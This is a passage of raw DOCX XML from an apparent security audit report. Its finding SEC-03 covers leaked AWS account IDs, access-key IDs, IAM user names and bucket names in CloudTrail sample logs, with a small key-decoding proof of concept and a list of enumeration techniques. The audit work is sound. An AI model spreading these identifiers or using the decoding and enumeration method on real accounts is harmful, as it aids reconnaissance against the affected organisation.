        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>license = "Apache-2.0"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>license-files = ["LICENSE"]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>requires-python = "&gt;=3.13"          # if feasible; otherwise document the 3.14 requirement in security_content/README</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>classifiers = ["License :: OSI Approved :: Apache Software License", "Programming Language :: Python :: 3.14"]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>[project.urls]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Source = "https://github.com/splunk/contentctl-ng"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Publish via PyPI Trusted Publishing with PEP 740 attestations and make the repository public (or publish a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>SECURITY.md</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>SBOM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> with each release). In this repo, pin by hash (DEP-01) so at least the bytes are fixed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Standards mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CWE:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-1104 Use of Unmaintained Third Party Components; CWE-1357 Reliance on Insufficiently Trustworthy Component. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OWASP Top 10 2021:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A06:2021 Vulnerable and Outdated Components, A08:2021 Software and Data Integrity Failures. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> T1195.001 Supply Chain Compromise: Compromise Software Dependencies and Development Tools. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST SP 800-53r5:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SR-3 Supply Chain Controls and Processes, SR-4 Provenance, SA-9, CM-8 System Component Inventory. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST CSF 2.0:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> GV.SC Govern - Cybersecurity Supply Chain Risk Management. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISO/IEC 27001:2022:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A.5.21 Managing information security in the ICT supply chain, A.5.22, A.5.32. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SANS Secure Coding Practice:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Dependencies / System Configuration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>4.7 Secrets and Sensitive Data</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>This area produced 6 unique findings: 4 Low, 2 Informational.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SEC-03 — Incomplete sanitisation of CloudTrail example logs leaks real AWS account IDs, access-key IDs, principals, roles and buckets</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: Low (CVSS v3.1 base 3.7). Exploitability: Not directly exploitable (reconnaissance enabler; PoC decoded account IDs).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> data_sources/aws_cloudtrail_*.yml (47 files, e.g. createaccesskey.yml:107, deletepolicy.yml:105, createvirtualmfadevice.yml:105, putbucketreplication.yml:128)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Low – CVSS v3.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>3.7</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 47 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>data_sources/aws_cloudtrail_*.yml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> files, one </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>example_log:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> line each (full list with line numbers in Tables T1/T4). Representative:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>data_sources/aws_cloudtrail_createaccesskey.yml:107  …"arn": "arn:aws:iam::121521347698:user/bhavin_cli", "accountId": "121521347698", "accessKeyId": "AKIAYTOGP2RLLAA6NJUM", "userName": "bhavin_cli"… "responseElements": {"accessKey": {"userName": "AtomicRedTeam", "accessKeyId": "AKIAYTOGP2RLOQ4ULYGT", "status": "Active"…</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>data_sources/aws_cloudtrail_deletepolicy.yml:105     …"arn": "arn:aws:iam::151521547504:user/bhavin_cli"… "sourceIPAddress": "61.25.42.212"…</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>data_sources/aws_cloudtrail_createvirtualmfadevice.yml:105 …"type": "Root", "accountId": "1111111111111111", "accessKeyId": "ASIASBMSCQHH2YXNXJBU"… "recipientAccountId": "140429656527"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>data_sources/aws_cloudtrail_putbucketreplication.yml:128 …"userName": "AWSReservedSSO_SPLKAdministratorAccess_d9ce1347d0a6dd3f"… "bucketName": "git-wild-hunt-results"…</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Description:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> The team rewrote </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>accountId</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">/ARNs to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>111111111111</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in most samples but left the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>accessKeyId</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> values intact. AWS access-key IDs embed the owning account ID (base32-decode chars 5–20, mask </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>0x7fffffffff80</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, shift right 7). Decoding every committed ID yields two accounts: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>`591511147606`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (24 of 27 distinct IDs, prefix </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>YTOGP2RL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; also present in clear inside the base64 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>sessionToken</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> of SEC-04) and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>`140429656527`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (prefix </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>SBMSCQHH</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; also left raw as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>recipientAccountId</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>createvirtualmfadevice.yml:105</w:t>
      </w:r>
      <w:r>
        <w:t>). Three more raw account IDs survive (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>151521547504</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>121522247101</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>121521347698</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – all tied to IAM user </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>bhavin_cli</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, which indicates per-file inconsistent hand edits rather than genuinely different accounts) plus </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>387769110234</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>aws_bedrock_claude.yml:59</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). Ten of the IDs are long-lived </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>`AKIA`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> keys (e.g. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>AKIAYTOGP2RLLAA6NJUM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> used across 6 files, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>AKIAYTOGP2RLOQ4ULYGT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> *created* for user </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>AtomicRedTeam</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). An access-key ID is not a secret on its own, but AWS treats it as sensitive: it tells an attacker which account to target, lets them enumerate IAM principals/roles without credentials (S3 bucket-policy condition probing, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>sts:AssumeRole</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> error oracles, role-name brute force against the leaked SSO permission-set naming </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>AWSReservedSSO_SPLKAdministratorAccess_*</w:t>
      </w:r>
      <w:r>
        <w:t>), and validates any secret-key half obtained elsewhere (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>sts:GetCallerIdentity</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> credential stuffing). The sample set also discloses internal bucket names (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>git-wild-hunt-results</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>security-content</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>patricktestbucket19</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>patricktestbucketencrypt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>my-cloudtrail-bucket-alfsujjpnbpguqrh</w:t>
      </w:r>
      <w:r>
        <w:t>), trail names (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>redatomictesttrail</w:t>
      </w:r>
      <w:r>
        <w:t>), IAM user names (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>bhavin_cli</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>gowthamaraj_cli</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>patrick_cli</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>bhavin_console</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>daftpunk</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>rhino_escalate</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>AtomicRedTeam</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>strt_fonder</w:t>
      </w:r>
      <w:r>
        <w:t>), principal IDs (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>AIDAYTOGP2RLEHRX5YWNV</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>AROAIJIESMXKGCJRCTPR6</w:t>
      </w:r>
      <w:r>
        <w:t>, …) and the residential egress IPs from which STRT members administered the account (SEC-05).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Untrusted-input reachability:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Pure disclosure; reader of the public repo → AWS reconnaissance. No secret-access-key is present anywhere in the tree or reachable history (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>grep -rniE 'aws_secret|secretAccessKey'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → only the AWS doc example </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>wJal…EXAMPLEKEY</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Verdict: Not directly exploitable; reconnaissance enabler (defence-in-depth).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proof of concept (executed locally, pure arithmetic, no AWS contact):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>$ python3 -I decode_keys.py      # body: base32-decode key[4:], take 6 bytes, &amp; 0x7fffffffff80, &gt;&gt; 7</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>AKIAYTOGP2RLLAA6NJUM 591511147606</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>ASIAYTOGP2RLKJXOV7VR 591511147606</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
